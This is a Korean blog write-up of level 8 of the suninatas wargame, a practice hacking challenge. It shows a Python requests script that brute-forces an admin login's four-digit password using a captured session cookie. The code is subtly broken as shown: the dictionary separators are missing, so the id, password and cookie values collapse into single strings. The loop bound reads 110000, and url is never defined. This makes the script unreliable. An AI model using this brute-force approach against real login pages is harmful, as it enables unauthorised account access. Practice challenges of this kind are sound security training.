DoR@Hee의 끄적끄적

suninatas 8 본문

WarGame/suninatas

suninatas 8

DoR@Hee 2019. 4. 27. 23:00

 

 

[그림1] 문제 화면

로그인 창 같은게 보인다 

Password Incorrent! 문자열이 보인다. 

 

[그림2] 소스보기

소스보기를 본 결과 post 방식이며 아이디는 admin이고 Password 는 0~9999라는걸 알 수 있다.

 

[그림3] URL 정보

URL 정보를 제대로 볼 수 없기 때문에 edit cookie를 이용해 정확한 정보를 알 수 있고

위 3가지 정보를 이용

 

 

1
2
3
4
5
6
7
8
9
import requests
 
cookies = {'ASPSESSIONIDASRDRRRB''GKODFJNBBAEMKCBNFCEHFOAJ'}
for i in range(110000):
    res = requests.get(url, data={'id''admin''pw''{0}'.format(i)}, cookies=cookies)
    if "Password Incorrect!" not in res.text:
        print("Key"+" {0} ".format(i), end='')
        break
http://colorscripter.com/info#e" target="_blank" style="color:#4f4f4f; text-decoration:none">Colored by Color Scripter
  

[코드1] 파이썬 코드

파이썬 코드를 작성

 

비밀번호를 확인

[그림4] 성공

 

 

 

 

 

 

'WarGame > suninatas' 카테고리의 다른 글

suniatas 22  (0) 2019.04.28
suninatas 7번  (0) 2019.03.05
suninatas 6번  (0) 2019.03.05
suninatas 5번  (0) 2019.03.04
suninatas 4번  (0) 2019.03.04
'WarGame/suninatas' Related Articles more
Comments